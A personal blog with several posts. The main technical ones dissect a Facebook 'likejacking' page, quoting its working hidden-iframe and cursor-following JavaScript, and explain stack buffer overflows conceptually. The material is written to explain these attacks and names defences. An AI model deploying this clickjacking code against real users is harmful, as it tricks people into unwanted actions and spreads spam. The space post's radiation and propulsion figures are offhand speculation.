1 March 2011, 22.31.00

Another (sort of) Facebook cross-site scripting

Yes, we have this sort of stuff going on almost every day, but today I fell for this one and, as I write this, 61976 more people have too. Strictly speaking it is not cross-site scripting at all but clickjacking (or "likejacking"): what the little bugger does is make you “like” something that is basically a pile of ads, so all your friends click on it and… well, you get it, don’t you?

Anyway, I had nothing to do so I dissected the thing a bit and it’s actually quite interesting. The page by itself looks like this:

Yeah, it *does* look fishy as hell

I did not click that one specifically. It looks like they redirect you to new ones as old ones get banned. As of now I’ve been routed through one about some supposedly funny webcam situation (yeah, I clicked that, shut up…) and another about Miley Cyrus which had a good reception among my contacts… sigh. Anyway the code looks like crap, of course, and it’s bloated with iframes. I looked into it a bit and found the first interesting piece of code.

<div id="fbLikeFrame" 
    style="overflow: hidden; width: 100px; height: 100px; position: absolute; opacity: 0;">
    <iframe scrolling="no" frameborder="0" name="fbframe" id="fbframe"
    allowtransparency="true" style="border: medium none; overflow: hidden;
    width: 50px; height: 23px;" 
    src="http://www.facebook.com/plugins/like.php?href=http://respectmiley.com/
           &amp;layout=standard&amp;show_faces=false&amp;width=450
           &amp;action=like&amp;font=tahoma&amp;colorscheme=light&amp;height=80">
    </iframe>
</div>

There you go: the attack point is a small iframe containing the real Facebook Like button for respectmiley.com. Its container is fully transparent (opacity: 0) and clipped to roughly the size of the button, so the button is there and perfectly clickable, you just can’t see it. When you’re not signed in it looks like this:

So, how do they force you to click it? With JavaScript, of course. Since you are expected to click on the video, this little snippet does the job:

// Focus the hidden input: the first click that lands anywhere else (the iframe) blurs it
document.getElementById('Troll').focus();
// Scroll offsets live on documentElement in standards mode and on body in quirks mode
var myHTMLBody = (document.compatMode == "CSS1Compat") ? document.documentElement : document.body;
var fbLikeFrame = document.getElementById('fbLikeFrame');
var myBoolean = 0;

// Keep the invisible container, and the Like button inside it, right under the cursor
function mouseFollower(e) {
    if (window.event) {
        // Old IE: event.x/y are viewport-relative, so the scroll offset is added back
        fbLikeFrame.style.top  = (window.event.y - 10) + myHTMLBody.scrollTop + 'px';
        fbLikeFrame.style.left = (window.event.x - 10) + myHTMLBody.scrollLeft + 'px';
    } else {
        // Everyone else: pageX/pageY are already document-relative
        fbLikeFrame.style.top  = (e.pageY - 10) + 'px';
        fbLikeFrame.style.left = (e.pageX - 10) + 'px';
    }
}
document.onmousemove = function(e) {
    // myBoolean is never changed in this snippet; the else branch would hide the frame once the job is done
    if (myBoolean == 0) { mouseFollower(e); } else fbLikeFrame.style.display = 'none';
}

This is pretty much self-descriptive. On every mousemove the invisible fbLikeFrame is repositioned so that the Like button is always right under the cursor. When you finally click to watch the video, you actually click the Like button inside the iframe. Because that click moves focus into the iframe, the hidden input with id Troll (focused by the first line of the snippet) loses focus, and its onblur handler sends the top-level page on to widget2.php. You can see this in the element’s definition:

<input type="text" style="width: 0px; height: 0px;" id="Troll" onblur="window.location = 'widget2.php'">

And that’s it. This new widget2.php page is mostly the same, but includes a pretty standard (and heavily obfuscated) script that prompts you to complete some surveys or whatever before you can get to the content itself. When you do that you’re finally allowed to click the video and you’re redirected to YouTube, where they show you a totally unrelated video about a three-year-old crying because of Justin Bieber (wat?).

So there you go: don’t click on fishy stuff, and if you feel like doing it anyway, use NoScript. Note that from the site side the usual cure is to refuse to be framed at all (an X-Frame-Options header or a frame-busting script), which is exactly what a Like button cannot do, since being embedded in other people’s pages is its whole purpose. Have fun.

7 January 2010, 13.12.00

Tags: science technology space

Invaders must die

Here I am again with lots of interesting stuff. Or maybe not. By the way, this is my first post from the iPod touch. It’s a rainy day and I’m taking the bus back home right now.

Lately I’ve been thinking about a lot of stuff: some ideas that have been in my mind and that I think deserve some attention. Most of them come from the fact that I recently played a great game, Mass Effect, an astounding futuristic role-playing video game by BioWare. A lot of futuristic technology is of course shown there, but the things that got my attention are precisely the most mundane.

One of them is the extended concept of modularity. For example, premade standardized plastic housing is the basis for all the ground camps depicted in the game. Why can’t we apply this concept to extending housing in the most underdeveloped areas here on Earth? Cheap plastic heat-insulated blocks equipped with basic water filters might help the poorest greatly. Of course a cost estimate must be made first of all, but if we can trim it down to the $100 range it could be the next step along the path the OLPC started.

Another interesting concept, unrelated to the game this time, is the possibility of reproducing photosynthesis artificially. If more money is invested in this technology we can reach a point where a solar-powered glucose generator is available. This would literally make most of the world’s hunger problems vanish by giving everybody an endless supply of basic nutrients.

Not only that: coupled with an efficient water supply it could boost the survivability of future space colonies on the Moon or other planets.

Okay, right now I’m taking the train and that makes me think about transportation. Space transportation, more specifically. We all know that a chemically propelled rocket will make it to Mars in about six months. Six months exposed to extreme cosmic-ray radiation. That is, in my opinion, too long. By making this trip you raise your chances of dying of cancer to over 40%. Shielding is still very experimental and will for sure be very heavy and costly if it ever becomes available. What is the solution, then? Speed, of course. If we can manage to travel there in two weeks instead of six months the radiation dose will be tolerable. And what kind of exotic, unreal technology can achieve this? Well, just some 60s nuclear weaponry knowledge. By using controlled nuclear explosions we could manage to reach 0.1c without problem and radically cut the travel time to other planets. Yes, Mars in two weeks and Luna in a couple of hours, maybe.

And why aren’t we building this marvel right now? Well, in fact it was planned to be built thirty years ago, but the international prohibition of nuclear testing in space made it unviable. Nuclear explosions in space can severely disrupt artificial satellites at a long distance because of the electromagnetic pulse they produce. But what if we used these methods only far away from LEO? I can’t think of a better use for those old nuclear warheads stored everywhere. We must push these ideas forward because this technology will eventually become a must for reaching the considerable speeds needed for a full-scale colonization of the solar system.

Well, next stop and I’m leaving the train. I will upload this post when I get home. Have fun, and excuse the typos.

6 January 2010, 02.35.21

Tags: web self crap

Still Alive

Crap, I just wrote some funny post about not writing a thing but doing lots of themes for the blog, and the damned Tumblr crashed. Anyway, I made a new theme because I was really bored, and I expect to give some life back to this blog by writing some posts about my last project and sharing some thoughts that have been roaming my mind recently.

If you care, stay tuned. By the way, I just bought Portal and replayed it. I love that game.

27 October 2009, 18.19.00

Tags: ISS space video future

ISS Tour

I just found an awesome video from January 2009 in which the astronaut Mike Fincke takes a tour inside the [International Space Station](http://en.wikipedia.org/wiki/ISS). If you haven’t seen it before and you are interested in space exploration I strongly encourage you to watch it.

Here is the four-part version on YouTube:

I hope you like it.

26 October 2009, 01.43.00

Tags: highlight javascript web programming

Syntax highlighting

I just added some syntax highlighting to the code shown in this blog and I thought it would be great to share with everybody how I did that.

Of course the first thing I did was a quick look on Google. I found lots of different scripts for the purpose, but almost all of them required you to explicitly define the language each piece of code is written in. I don’t want to waste my time doing that. Fortunately I found google-code-prettify, which has great auto-detection capabilities.

Installing the script

First we upload all the files that come in the zip to some server. Then we link both the main JavaScript file and the CSS file from our HTML:

<script type="text/javascript" src="SERVER/prettify.js"></script>
<link href="SERVER/prettify.css" type="text/css" rel="stylesheet" />

After that we initialize the script, either by adding an onload attribute to our body tag

<body onload="prettyPrint()">

or, if we are using jQuery for example, by adding this to our JavaScript:

$(document).ready(function() {
    prettyPrint();
});

Finally we add the prettyprint class to every pre or code tag we want highlighted. We can add it dynamically to all the code tags with

$('code').addClass('prettyprint');

If we don’t like the result we can customize how our code blocks look by styling either the code elements or the .prettyprint class in our CSS.

With this simple process all the code we include in our blog will be automatically recognized and highlighted accordingly.

And now I’m going to bed because I’ll wake up tomorrow at 6.45, and that’s just in five hours. Good night.

25 October 2009, 02.30.05

Tags: tumbrl web self CSS

Customize your Tumblr

Normal users have a pretty good range of choices when they want to start a new blog. There are lots of free blogging sites like WordPress.com, Blogger or Tumblr where you can start writing without the trouble of installing (and paying for) your own hosting and blogging software.

But usually the more advanced users look for something more customizable, and then the canonical option if you don’t want to develop your own CMS is WordPress. Even with the free online version at WordPress.com you can develop fully custom themes with all kinds of goodies, including custom external CSS, separate JavaScript files, et cetera.

But some of us just love the simplicity and awesomeness of Tumblr. And most of us just don’t want to use one of these generic themes that everyone uses. The problem is that the only customization Tumblr allows is pasting your HTML code into a poor textarea. And that’s not enough for me.

The good stuff: templating

Even with this limitation, Tumblr is very customizable. When writing your HTML code you can use lots of special tags, like {Title} or {RSS}. These are replaced by the corresponding values in the final view. As you would expect from this kind of templating engine, you can define loops that are executed for each post in your blog, et cetera. You can find all this information on the corresponding page of the Tumblr documentation site.

The limitation of this method is that you can only embed your CSS into the same code. You can’t upload your own css or js files and (I think) you can’t even upload your theme’s images.

The solution

Sure, you are going to say this is obvious, dude, but it was great for me when I figured it out. The thing is that I got a ridiculous 5 MB of web space with this domain. I thought it was useless, but it turned out to be essential to my project. I uploaded all the JavaScript, CSS and images to that tiny site and just linked to those files from my HTML. Problem solved: now I have a full-featured modular CSS style for my blog without losing the great aspects of having a Tumblr-based blog.

You can do the same with one of these free hosting services. Even if they put ads on your site, CSS and other files are not affected by that. Bear in mind, though, that any script you load from there runs with full access to your blog page and its readers, so only use a host you trust not to tamper with the files it serves. Just link them from your custom HTML in Tumblr and watch your site grow modularly.

25 October 2009, 01.50.00

Tags: self security stack overflow exploit programming

0x41: the why, the how

You know, this blog is called 0x41. Maybe it’s not one of those fancy web 2.0 names and it’s definitely not an easy title to remember. But it actually means something.

As the most tech-savvy of you know, 0x41 (hexadecimal 41, decimal 65) corresponds to the character A in the ASCII table. And this is relevant not because it’s the first letter of my name, but because this character is the most common filler byte in the input strings used by a huge range of overflow exploits.

What? Strings? Overflows? Exploits? What’s going on here? Let me explain.

Fun example: the Stack

Computers are complicated creatures. If you know some programming (if you don’t, you will probably understand nothing of this) you may have asked yourself how the computer knows which arguments were passed to a function, or how it remembers where to go back after executing some subroutine. The answer may depend on the architecture or the operating system, but a fairly common approach is the use of the stack.

The stack is just a chunk of memory assigned to a process. It typically sits at the high end of the process’s address space, above the code, the static data and the heap, and its purpose is to hold the local variables, function arguments and return addresses a program needs at run time. As the name suggests, the stack follows a LIFO (Last In, First Out) discipline, where push and pop instructions add values to and retrieve them from the pile. On x86 the stack grows towards lower addresses, so what we call the top of the stack is actually the lowest address in use. Think of it as pushing stuff towards the ceiling into some sort of pipe and then pulling it back down towards the floor. Or something like that.

Two registers, the stack pointer and the frame pointer, do the bookkeeping for this structure. The stack pointer always points to the current top of the stack (the last value pushed), while the frame pointer points to a fixed spot in the current function’s frame, so that arguments and local variables can be addressed as constant offsets from it.

When you call some function in your code some important values will be pushed to the stack in a certain order. For example:

int sum(int a, int b) {
    return a + b;
}
int main() {
    sum(2, 3);
    return 0;
}

Here the sum(2, 3) call will be translated by the compiler (32-bit x86, C calling convention) to something like:

pushl $3        # arguments are pushed right to left
pushl $2
call sum        # pushes the return address, then jumps to sum

That is, the two given values (the literals 2 and 3) are pushed onto the stack, right to left, and then the function is called. Before jumping into the function, the call instruction pushes the return address: the address of the instruction right after the call, which is where execution will resume when sum finishes.

The first thing to happen inside sum is the caller’s frame pointer being pushed onto the stack. Then the current stack pointer value (which now points at that saved frame pointer) is copied into the frame pointer register. Finally, all the memory needed for the local variables is allocated on top of the stack, simply by subtracting the required number of bytes from the stack pointer. Here is a quick diagram of this mess:

Low memory                                                      High memory
[   Local variables   ][ Old FP ][ Return addr. ][ 2 ][ 3 ]
^                      ^
|                      '-- Frame pointer points here
'-- Stack pointer points here (the stack grows this way, towards low memory)

After all this magic happens, our function just uses the frame pointer as a reference for retrieving both numbers (they sit at fixed positive offsets from it), adds them, returns the value, restores the old frame pointer and finally jumps back to the return address that call pushed at the beginning.

Exploiting this shit

Okay, all that technical stuff is great, but how is it useful to me, and how is the ‘A’ character related to it? You’ll find out in a moment. Imagine we have some function with a local variable, let’s say

 char buffer[10];

As you may know, this declares a 10-element character array, that is, a set of 10 ASCII characters sitting one next to the other. In this situation our stack will look something like:

 [ Other local variables ][ 10 char array ][ Old FP ][ Return Add. ][ Function parameters ]

Let’s say our function fills this array from user input with something like strcpy or gets, and let’s imagine there is no check on the length of that input. We can then write more than 10 characters and, as you would expect, the extra bytes overwrite whatever sits next to the array on the stack: first the saved frame pointer, then the return address. Maybe you already know what’s going on here.

We start our debugger and run the program. We get some input prompt, let’s say a username or password field, and we decide to type a really large number of ‘A’ letters. Bang! The program crashes, and we get the debugger’s verdict: a fault accessing the unknown memory location 0x41414141. That is four of our ‘A’ bytes (0x41 each) being interpreted as a 32-bit address. Then we smile.

What this means is simple. When the function has finished its business it tries to continue executing where it left off, but we replaced that place with a bunch of A’s and obviously 0x41414141 doesn’t point anywhere valid. Now imagine we work out the exact distance from the start of the array to the return address. We can then put anything we want at that specific spot, for example the address of some nasty code that opens a backdoor on the computer, giving anybody access to the system from the Internet.

That code is called shellcode, and there’s a whole world of techniques for getting it into the right spot. This overflowing-string injection technique is basically the cornerstone of most software-breaking processes, from the most obscure hacking of some government facility to the jailbreak of your iPhone.

That’s it

Well, now you know why this blog is called 0x41. It doesn’t mean this is one of those security-focused sites; I just found it funny. If you want to learn more about stack overflows you must read the 1996 Phrack classic Smashing the Stack for Fun and Profit by Aleph One. I learnt almost everything I know about this topic from that text. Bear in mind that modern compilers and operating systems add stack canaries, non-executable stacks and address space randomization precisely to make this plain version of the attack fail, so in practice the technique is a good deal more involved than the sketch above.

Of course, if you find something wrong (which is likely, as I’m very far from being any kind of security or computer expert) just tell me in the comments and I’ll fix it.

Have a nice day.

23 October 2009, 00.27.32

Tags: travel deutschland frankfurt skyline


Random Frankfurt skyline. Just for designing purposes.

22 October 2009, 21.46.00

Tags: self

Look ma, another blog

Well, hello. I don’t know how to start this. A couple of days ago I decided I wanted one of those fancy .eu domains. The problem is I had no idea what to do with it. And somehow I ended up building this sort of blog without a purpose or even a main topic.

I assume I’m never going to write anything here again, but anyway I need some kind of placeholder text here, and that’s why I’m going to write about myself.

My name is Adrià López. I’m from Spain and, in fact, this is the first time I write a blog post in English. I don’t even know why I’m doing this. Nobody is going to care about my stuff, so I could just write in one of my first languages. But there would be no challenge in doing that. Or something. Anyway, nowadays I’m studying Physics at the UV. Besides that, my main interests include all these computer science things, and electronics too. You know, a standard geek.

This means that if I write something here it will probably be about one of these topics. Or it won’t, I don’t know. We’ll see.

Can’t find anything else to say right now. Stay tuned, or not.